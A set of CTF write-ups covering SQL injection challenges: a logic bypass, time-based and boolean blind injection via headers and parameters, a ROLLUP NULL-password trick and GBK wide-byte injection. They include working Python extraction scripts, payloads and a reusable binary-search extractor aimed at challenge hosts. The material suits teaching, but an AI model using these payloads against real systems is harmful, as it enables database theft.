【1】 The challenge says it filters everything, but testing showed that the double quote, and, left, right and similar keywords are not filtered. What matters more is that the page returns the same response whether the injected SQL is valid or not; every approach tried gave the same result.
That leaves only a logic bypass. The verification query was presumably something like
select * from *** where username ="" and password="";
Neither a username nor a password was known. At a loss, I stared at it for a long time,
then got the bypass:
username=hello"=" & password = hello"="
The query becomes username ="hello"="" and password="hello"="". MySQL evaluates left to right: username="hello" is 0 (false), then 0="" compares 0 with "" cast to a number, which is 0=0, true. The password side works the same way, so the WHERE clause is true for every row.
Got the flag.
【2】 XFF time-based injection, no filtering
' or sleep(10) and ''='
The response is delayed, so the X-Forwarded-For header is injectable.
' or sleep((select length(flag) from flag)=32) and ''='
The argument to sleep() is a boolean here: sleep(1) when the length is 32, sleep(0) otherwise, so a one-second delay confirms the flag is 32 characters long.
Straight to the code
#coding:utf-8
"""
@author: elope
"""
import requests

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
maystr = "0987654321qwertyuiopasdfghjklzxcvbnm."
flag = ''
# substring positions are 1-based (substring(x from 0 for 1) returns '' in MySQL), so start at 1
for j in range(1, 33):
    for i in maystr:
        header = {
            # "X-Forwarded-For": "' +(select case when (substring((select database())from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j, i),  # dump the database name
            # "X-Forwarded-For": "' +(select case when (substring((select(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j, i),  # dump the table names
            # "X-Forwarded-For": "' +(select case when (substring((select(select(group_concat(column_name))from(information_schema.columns)where(table_name=0x666C6167))) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j, i),  # dump the column names
            "X-Forwarded-For": "' +(select case when (substring((select flag from flag) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j, i)  # dump the record
        }
        try:
            # 4 s timeout against a 5 s sleep: the request only times out when the guess is right
            res = requests.get(url, headers=header, timeout=4).text
        except requests.exceptions.RequestException:
            flag += i
            print(flag)
            break
This version double-checks every hit: slower, but more reliable.
import requests
import time

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
maystr = "0987654321qwertyuiopasdfghjklzx{_-%!@&*^(?|)}cvbnm."
flag = ''
for i in range(1, 33):          # 1-based substring positions
    for j in maystr:
        starttime = time.time()
        headers = {"X-Forwarded-For": "' +(select case when (substring((select flag from flag) from %s for 1)='%s') then sleep(15) else 0 end) and 'Zkkp'='Zkkp" % (i, j)}
        res = requests.get(url, headers=headers)
        if time.time() - starttime > 10:
            # possible hit: time a second request so one slow network round-trip is not counted
            starttime = time.time()
            res = requests.get(url, headers=headers)
            if time.time() - starttime > 10:
                flag += j
                print(flag)
                break
Gives the result directly.
【3】 Forcing the password to be empty
Straight to the code
<?php
error_reporting(0);
if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="uname" type="text"/>'."<br/>";
    echo '<input name="pwd" type="text"/>'."<br/>";
    echo '<input type="submit" />'."<br/>";
    echo '</form>'."<br/>";
    echo '<!--source: source.txt-->'."<br/>";
    die;
}

// blacklist check, applied to every POST field (arrays are imploded first)
function AttackFilter($StrKey,$StrValue,$ArrReq){
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){
        print "水可载舟,亦可赛艇!";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);

// uname is interpolated into the statement without escaping
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql);
if (mysql_num_rows($query) == 1) {
    $key = mysql_fetch_array($query);
    // loose comparison
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇!";
    }
}else{
    print "一颗赛艇!";
}
mysql_close($con);
?>
Bypassing the username is easy: uname = ' or 1=1 limit 1#
makes the query return exactly one row, which is all that mysql_num_rows($query) == 1 checks.
But the password you submit has to equal the one read from the database, which is circular: if you knew it, you would already have the flag.
if($key['pwd'] == $_POST['pwd'])
This is a loose comparison. In PHP, NULL == '' is true, so if the password read from the database can be made NULL, submitting an empty pwd passes the check.
First, how many users are there?
select * from test limit 1 offset 1;   returns a row
select * from test limit 1 offset 2;   returns nothing
So there are exactly two rows. (limit 1,1 would do the same, but the comma is in the blacklist; MySQL also accepts limit n offset m, which avoids it.)
Now we need to produce a NULL value. group by pwd with rollup appends a summary row to the result whose grouped column, pwd, is NULL; with two users with different passwords that summary row is the third one, selectable with limit 1 offset 2. None of the words involved are in the filter.
Success.
Submit uname = admin' or 1=1 group by pwd with rollup limit 1 offset 2#&pwd=(empty)
and the flag comes back.
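A pre-flight check for this challenge, added here as an example and not part of the original writeup: it re-implements the AttackFilter() regex from the source above in Python so candidate uname payloads can be tested against the blacklist offline before they are sent. The candidate payloads are constructed for the example; the regex, its /is flags and the query template are the ones in the PHP source.

```python
import re

# The blacklist from the challenge source, compiled the way preg_match("/.../is") applies it:
# case-insensitive, dot matches newline. A match anywhere in the value aborts the request.
FILTER = re.compile(r"and|select|from|where|union|join|sleep|benchmark|,|\(|\)", re.I | re.S)


def attack_filter_blocks(value) -> bool:
    """Mirror of AttackFilter(): PHP implodes array values with '' before matching,
    so submitting uname[]=... does not get around the regex."""
    if isinstance(value, (list, tuple)):
        value = "".join(value)
    return FILTER.search(value) is not None


def resulting_query(uname: str) -> str:
    """The statement the server builds; uname is interpolated with no escaping."""
    return "SELECT * FROM interest WHERE uname = '%s'" % uname


# Candidate payloads for the uname field (constructed for this example).
CANDIDATES = {
    "union": "' union select 1,2,3#",                  # union, select and the commas
    "comma_limit": "' or 1=1 limit 1,1#",              # the comma alone is enough to block it
    "single_row": "' or 1=1 limit 1#",                 # passes: one row, wrong password
    "rollup": "admin' or 1=1 group by pwd with rollup limit 1 offset 2#",  # passes: NULL pwd row
}


def survivors() -> list:
    """Names of the candidates that get past the blacklist."""
    return [name for name, payload in CANDIDATES.items() if not attack_filter_blocks(payload)]


if __name__ == "__main__":
    for name in survivors():
        print(name, "->", resulting_query(CANDIDATES[name]))
```

Only the two payloads without commas, parentheses or blacklisted keywords survive; the rollup one is the only survivor that also yields a row whose pwd is NULL.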
【4】 Plain blind injection, no tricks
Code:
import requests

flag = ""
for i in range(1, 30):
    for j in range(33, 126):          # printable ASCII
        url = "http://ctf5.shiyanbar.com/web/index_3.php?id=1'and if(ascii(substr((select flag from flag)," + str(i) + ",1))=" + str(j) + ",1,0)%23"
        res = requests.get(url)
        # the page only says Hello when the injected condition is true
        if 'Hello' in res.text:
            flag += chr(j)
            print(flag)
            break
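The scripts in sections 2 and 4 try every candidate character in turn, so one position can cost as many requests as there are candidates. Added example, not from the original writeup: the same two injection points driven by a binary search over the ASCII value, which needs at most eight yes/no questions per character. The payloads are the page's, with the = comparison replaced by > so that each question halves the remaining range; ascii('') is 0 in MySQL, which is how the end of the flag is detected. The extractor takes an oracle callback, so the time-based header oracle (section 2), the boolean Hello-marker oracle (section 4) and an offline mock with a made-up secret all plug into it. The URLs, delay and marker defaults are assumptions taken from the scripts above; the mock secret is constructed.

```python
import time
import urllib.parse
import urllib.request
from typing import Callable

# An oracle answers one yes/no question: is ascii(char at 1-based `pos` of the secret) > `val`?
# ascii('') is 0 in MySQL, so oracle(pos, 0) == False means the secret ends before pos.
Oracle = Callable[[int, int], bool]


def extract(oracle: Oracle, max_len: int = 64) -> str:
    """Recover the secret with a binary search over the ASCII range per character:
    at most 1 + 7 oracle calls per character instead of one call per candidate."""
    secret = ""
    for pos in range(1, max_len + 1):
        if not oracle(pos, 0):          # nothing at this position: done
            break
        low, high = 0, 127              # invariant: low < char <= high
        while high - low > 1:
            mid = (low + high) // 2
            if oracle(pos, mid):
                low = mid
            else:
                high = mid
        secret += chr(high)
    return secret


# Payloads: the page's two injection points with '=' replaced by '>' so that
# one comparison can drive the binary search above.

def xff_time_payload(pos: int, val: int, delay: int = 5) -> str:
    """Value for the X-Forwarded-For header of the wonderkun challenge (time-based)."""
    return ("' +(select case when (ascii(substring((select flag from flag) from %d for 1))>%d) "
            "then sleep(%d) else 0 end) and 'Zkkp'='Zkkp" % (pos, val, delay))


def id_boolean_payload(pos: int, val: int) -> str:
    """Value for the id parameter of index_3.php (boolean-based); '#' is URL-encoded by the caller."""
    return "1'and if(ascii(substr((select flag from flag),%d,1))>%d,1,0)#" % (pos, val)


def make_time_oracle(url: str, delay: int = 5) -> Oracle:
    """Time-based oracle: 'true' when the request takes at least `delay` seconds. A timeout is
    also counted as true, as in the page's first script, and a hit is re-checked once so that a
    single slow network round-trip is not mistaken for sleep()."""
    def timed_request(pos: int, val: int) -> bool:
        req = urllib.request.Request(url, headers={"X-Forwarded-For": xff_time_payload(pos, val, delay)})
        start = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=delay * 2) as resp:
                resp.read()
        except OSError:                 # includes the socket timeout: sleep() fired
            pass
        return time.monotonic() - start >= delay

    def oracle(pos: int, val: int) -> bool:
        return timed_request(pos, val) and timed_request(pos, val)
    return oracle


def make_boolean_oracle(url: str, marker: str = "Hello") -> Oracle:
    """Boolean-based oracle: 'true' when the marker string appears in the response body."""
    def oracle(pos: int, val: int) -> bool:
        query = urllib.parse.urlencode({"id": id_boolean_payload(pos, val)})
        with urllib.request.urlopen(url + "?" + query, timeout=10) as resp:
            body = resp.read().decode("utf-8", errors="ignore")
        return marker in body
    return oracle


def make_mock_oracle(secret: str) -> Oracle:
    """Constructed stand-in for the remote database so the example runs offline."""
    def oracle(pos: int, val: int) -> bool:
        ch = secret[pos - 1] if pos <= len(secret) else ""
        return (ord(ch) if ch else 0) > val
    return oracle


if __name__ == "__main__":
    # Offline run against a made-up secret. For the live targets swap in
    # make_time_oracle("http://ctf5.shiyanbar.com/web/wonderkun/index.php") or
    # make_boolean_oracle("http://ctf5.shiyanbar.com/web/index_3.php").
    print(extract(make_mock_oracle("flag{constructed_example}")))
```

Against the time-based target each question costs a round trip plus the sleep on a hit, so the re-check in make_time_oracle roughly doubles the cost of true answers; it is still far fewer requests than walking the whole candidate alphabet per position.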
【5】 A problem from njctf
Spaces are filtered. The backend uses a double-byte charset, so a wide-byte injection works: the single quote is escaped, but the %df byte sent in front of it combines with the escaping backslash into one multibyte character and the quote comes out unescaped. Double quotes are treated as ordinary characters and cannot delimit a string, so the value being compared is sent hex-encoded (0x..) instead.
import binascii
import requests

s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
# no spaces (parentheses separate the keywords), %df' is the wide-byte trick, the compared character is a hex literal
u = "http://218.2.197.235:23733/index.php?key=a%df'||right(left((select(flag)from(flag)),{pos}),1)=0x{c}%23"
payload = ''
for i in range(1, 35):
    for c in s:
        url = u.format(pos=i, c=binascii.hexlify(c.encode()).decode())
        r = requests.get(url)
        if 'showContent' in r.text:
            payload += c
            print(payload)
            break
    if payload and payload[-1] == '}':
        break
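Added example, not from the original writeup, showing why the a%df' prefix and the hex literal in the payload above are needed. addslashes() here is a byte-level model of PHP's escaping, the GBK connection charset is the assumption behind the wide-byte trick, and the query-string builder reproduces the page's key= parameter; the input bytes are constructed.

```python
import binascii
import urllib.parse

# Bytes that PHP-style escaping (addslashes, or mysql_real_escape_string on a connection that is
# not charset-aware) prefixes with a backslash. Modelled here for the demonstration.
ESCAPED = set(b"'\"\\\x00")


def addslashes(raw: bytes) -> bytes:
    """Escape the four characters PHP's addslashes() protects, byte by byte."""
    out = bytearray()
    for b in raw:
        if b in ESCAPED:
            out.append(0x5C)           # the inserted backslash
        out.append(b)
    return bytes(out)


def as_gbk_server_sees_it(raw: bytes) -> str:
    """What a server with a GBK connection charset makes of the escaped bytes. 0xDF followed
    by 0x5C (the inserted backslash) is one valid GBK character, so the quote after it is bare."""
    return addslashes(raw).decode("gbk", errors="replace")


def quote_is_live(raw: bytes) -> bool:
    """True when the decoded string contains a single quote not preceded by a backslash."""
    text = as_gbk_server_sees_it(raw)
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\") for i, ch in enumerate(text))


def build_payload(pos: int, c: str, prefix: bytes = b"a\xdf'") -> str:
    """The njctf query string: no spaces (parentheses instead), the wide-byte prefix, and the
    compared character as a hex literal because ' is escaped and " is just a character."""
    hexc = binascii.hexlify(c.encode()).decode()
    return "key=%s||right(left((select(flag)from(flag)),%d),1)=0x%s%%23" % (
        urllib.parse.quote(prefix), pos, hexc)


if __name__ == "__main__":
    for sample in (b"a'", b"a\xdf'"):           # constructed inputs: plain quote vs wide-byte prefix
        print(sample, "->", repr(as_gbk_server_sees_it(sample)), "live:", quote_is_live(sample))
    print(build_payload(1, "f"))
```

A plain quote arrives escaped; with the 0xDF byte in front, the server-side decode consumes the backslash as the second half of a GBK character and the quote closes the string literal, after which the rest of the payload is parsed as SQL.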